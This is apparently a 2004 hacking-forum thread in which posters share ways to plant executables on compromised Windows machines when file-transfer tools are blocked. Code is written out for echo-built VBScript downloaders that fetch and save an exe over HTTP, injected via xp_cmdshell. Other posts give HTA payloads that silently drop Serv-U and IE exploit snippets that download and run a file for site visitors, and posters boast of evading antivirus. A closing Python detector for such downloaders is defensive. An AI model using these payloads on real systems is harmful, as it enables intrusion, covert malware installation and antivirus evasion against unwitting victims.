yes this is a really helpful script... the AV program won't be a problem.. you can always first upload the tlist.exe to see what processes are on, and kill them with kill.exe
boshcash
Feb 10 2004, 08:46 PM
QUOTE (Mik3yZ @ Feb 10 2004, 01:48 PM)
yes this is a really helpful script... the AV program won't be a problem.. you can always first upload the tlist.exe to see what processes are on, and kill them with kill.exe
u can't upload a single file, this is supposed to be the problem
barty32
Feb 11 2004, 04:44 PM
I tested it: it workz very well!
thx
swya
Feb 11 2004, 11:36 PM
I've tried this locally, and my up to date Norton Antivirus 2003 didn't detect or try to stop it. Works great
the script doesn't download the file WINDOWS 2000 . help
i'm getting the same error
but i tested on win98se
freeman
Feb 12 2004, 06:52 PM
you know what, i got this box been up for 2 months now but no ftp or tftp to upload my file. i will continue enjoy looking at it if there is no method to infect it damn
dtDaMan
Feb 12 2004, 10:55 PM
Hi!
Well, on WIN XP GERMAN it works very fine.
NiCe work guy!!!!
DaMan
gephorce
Feb 13 2004, 01:28 AM
Nice Info, Thanks!
ghasedak
Feb 13 2004, 04:46 AM
It isn't good code for PCs that have AV anti-viruses that prompt on running scripts.
boshcash
Feb 14 2004, 05:34 AM
again guys some pcs maybe stopped by net stop command, second thing, if someone has errors when running scripts, i think he has missing components, he can use another way, which is echoing a vbs file that creates an exe file without downloading (exe is inside vbs) ..
x1`
Feb 16 2004, 07:23 PM
do u guys know a free http host that will host my files , so i can edit to direct to this free host thx if u can help
Killaloop
Feb 17 2004, 12:35 AM
one way that always works (and I mean on about 50 hosts i have tried) is: Write a vb script into a hta file. What does this vbscript do? this vbscript has encoded servu.exe and ini into ASCII. the resulting hta will be about 2.5mb of size. now you put it on a webserver of your choice and run it on your 'target' mshta http:\\bla\bla.hta
wait about 1 minute and your servu is there. just a hint. because most executables get very big when converted to ASCII I recommend you do as I do:
What the hta does:
it directly writes a selfcoded ascii to exe converter onto the target (very small one)
it creates an ascii txt file on the target (ascii source file for servu)
it runs the converter to convert the servu.exe
it directly writes the servu.ini
however, because of script warnings I have removed the automatism of directly running the ascii converter. so it will only directly write all needed files onto harddisk and you will start the converter manually. this way NO Antivirus program will say a single word about my script, since it doesn't launch any program. It works very nice this way. for those of you who know what I'm talking about: try it out, it works pretty well. for the others: I don't give away my hta files
hope this helped anyone
boshcash
Feb 17 2004, 01:10 AM
yea u r right its a good way , but the problem in hta files that they show a window on the screen but u can also put a script to close it as soon as possible , so the user doesnt notice ..
Killaloop
Feb 17 2004, 01:42 AM
you simply put Close at the end, no problem. got very nice results doing so. and besides ... having internet explorer installed you never wonder about explorer windows popping up ^^
HAnzsz
Feb 17 2004, 10:10 AM
yeah dude~!!
thx very much
this shit is tested and works for me.
for people with problems.. read all replies.. you will understand what you are doing wrong as you see others try it too.
dont forget in sql you must put "exec xp_cmdshell'" in front of it
thought that was the dudes mistake who couldn't echo
Rave4
Feb 17 2004, 01:16 PM
i will try it , today , thanks.
blackwarrior
Feb 19 2004, 10:44 AM
:\ hmmm... nice .. but.. i will continue using ftp -s
Killaloop
Feb 19 2004, 11:11 AM
tftp -s? hehe think you dont understand the point of this topic ^^
how to get your files onto a host when no filetransfertools are left (deleted to secure a box) or if they are blocked by firewall. no flame, just wanted to point this out
o0oKARo0o
Feb 20 2004, 01:37 AM
wow, very nice one, it works fine, very useful post thanks ten times
metrox
Feb 21 2004, 12:48 PM
thanks for the nice method
DvilleStoner
Feb 21 2004, 01:02 PM
netcat opens a cmd prompt on a certain port if you bind it to the cmd.exe file right?
What is the proper command for this?
ozz
Feb 21 2004, 04:22 PM
thanks a lot, that would be very useful!
DvilleStoner
Feb 21 2004, 05:51 PM
Nevermind, I found it. . .=], great site
Israel
Feb 21 2004, 11:39 PM
Thanx, nice idea
o0oKARo0o
Feb 24 2004, 04:45 AM
this works fine as well..
CODE
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
  <security>
    <exploit>
      <![CDATA[
      <object id="oFile" data="fichier a telecharger et executer"></object>
      ]]>
    </exploit>
  </security>
</xml>
or this one in a webpage that you would create before and then forcing the victim to connect to..
<script>
var oPopup = window.createPopup();
function showPopup() {
  oPopup.document.body.innerHTML = "<object data=fichier a telecharger et executer>";
  oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>
Flapdrol
Feb 26 2004, 10:28 PM
If you get errors try putting spaces after the values for the constants::
yep this one got discovered and patched. nearly needless by now. for better results try my method as described if you know vbs it works and cant be bugfixed since its no bug its a feature of mshta and cant be fixed (like fixing ftp.exe to not let it transfer files) ^^
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"
dir /s ca[1].rar
copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar
del 0QMVC11H\ca[1].rar
the problem is searching for downloaded file , and the window left open after the file was downloaded
marcoz
Feb 29 2004, 01:46 PM
nice one
tianzhen
Mar 2 2004, 02:37 AM
CODE
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1>>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs
when i run it got a kav popup , but this worx just fine:
really guys test it if this isnt detected by AVs , i will put this instead of mine , credits will goto tianzhen if it isnt detected by AV , i would be very thankful to u man
I tested it , it works 100% , still didnt test it with AVs though ..
totof
Mar 2 2004, 01:21 PM
Works very well thanks man !! good 2 go!!
FuzZyBeeR
Mar 2 2004, 03:15 PM
Thanx for this. Always used the old way before
boshcash
Mar 2 2004, 08:44 PM
plzz tell me if tianzhen's way isnt detected or not , if u have tested it , and it doesnt get detected , i will edit main post and add it thanks tianzhen ...
woww . mcafee failed to detect it .. thats nice . i will edit main post
Roby
Mar 4 2004, 01:35 PM
tianzhen mod wasnt detected by NAV latest virus definitions!
Thanx much for this fine way of transferring files!
BuzzDee
Mar 12 2004, 05:53 PM
tianzhen's method is just gr8!!
worx perfectly!!
even with avs installed. norton and mcafee didnt detect it!!
THX VERY MUCH!! THIS IS AWESOME!!
gerok
Mar 13 2004, 12:09 AM
how would you incorporate this code to an html file (so when people visit a certain webpage, it'll load)? Examples?
worked on my system (XP) and downloaded the file. never tested it to execute the file afterwards (you're echo'ing the script from cmd shell, can run the file yourself)
also not detected by my Norton Av corp 8.1
xDD
Mar 13 2004, 11:03 PM
This method yeah download files but cant execute! Think NOT BINARY MODE then download ...
C:\>program.exe
This program must be run under Win32
boshcash
Mar 13 2004, 11:15 PM
the vbs file itself isnt binary, but it downloads binary files from http successfully. i tested my computer and other pc, works perfectly with tianzhen's way, now its fully undetected !
xDD
Mar 13 2004, 11:35 PM
OK my fault (filtered) source ...
I change www and thats work
archiv
Mar 13 2004, 11:38 PM
CODE
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1>>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs
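For defenders reviewing process-creation logs, an added example (not code from this thread or its posters): the script above is written one `echo` fragment at a time, so no single command line carries the whole pattern, and the check below reassembles each echoed script file before testing it; it also flags `mshta` pointed at a remote location. The rule names, the indicator list and the sample command lines are constructed assumptions.

```python
import re

# "echo <text> > file" or ">> file" where the target is a script type.
ECHO_REDIRECT = re.compile(
    r'^\s*(?:cmd(?:\.exe)?\s+/c\s+)?echo\s(.*?)\s*(>>?)\s*'
    r'"?([^">]+?\.(?:vbs|vbe|js|hta))"?\s*$', re.I)
# Script-body traits: HTTP client object, binary stream, executable saved to disk.
INDICATORS = {
    "http-object": re.compile(
        r'CreateObject\(\s*"(?:Microsoft\.XMLHTTP|MSXML2\.[^"]*XMLHTTP[^"]*|WinHttp\.[^"]+)"', re.I),
    "binary-stream": re.compile(r'CreateObject\(\s*"ADODB\.Stream"', re.I),
    "save-executable": re.compile(r'\.SaveToFile\s+"[^"]+\.(?:exe|dll|scr|com)"', re.I),
}
# mshta given a URL or UNC path instead of a local file.
MSHTA_REMOTE = re.compile(r'\bmshta(?:\.exe)?"?\s+"?(?:https?:|\\\\)', re.I)

def rebuild_echoed_scripts(cmdlines):
    """Reassemble each script file from the echo fragments that wrote it."""
    files = {}
    for line in cmdlines:
        m = ECHO_REDIRECT.match(line)
        if not m:
            continue
        text, op, target = m.group(1), m.group(2), m.group(3).lower()
        if op == ">":  # a single '>' truncates the file, '>>' appends
            files[target] = []
        files.setdefault(target, []).append(text)
    return {path: "\n".join(parts) for path, parts in files.items()}

def detect(cmdlines):
    """Return (rule, subject, indicators) tuples for a batch of command lines."""
    alerts = []
    for path, body in rebuild_echoed_scripts(cmdlines).items():
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(body))
        if "save-executable" in hits and len(hits) >= 2:
            alerts.append(("echo-built-downloader", path, hits))
    alerts += [("mshta-remote-hta", l.strip(), []) for l in cmdlines if MSHTA_REMOTE.search(l)]
    return alerts

# Constructed process-creation command lines (not taken from a real host).
SAMPLE = [
    r'echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>c:\madefile.vbs',
    r'echo HTTPGET.Open "GET", "http://files.example/file.exe", False>>c:\madefile.vbs',
    r'echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs',
    r'echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs',
    r'echo WScript.Echo "backup finished">c:\notify.vbs',
    r'mshta http://files.example/bla.hta',
]
if __name__ == "__main__":
    print(detect(SAMPLE))
```

The same reassembly step applies to any log source that records one command line per event, provided events are grouped by host and parent process before being passed to `detect`.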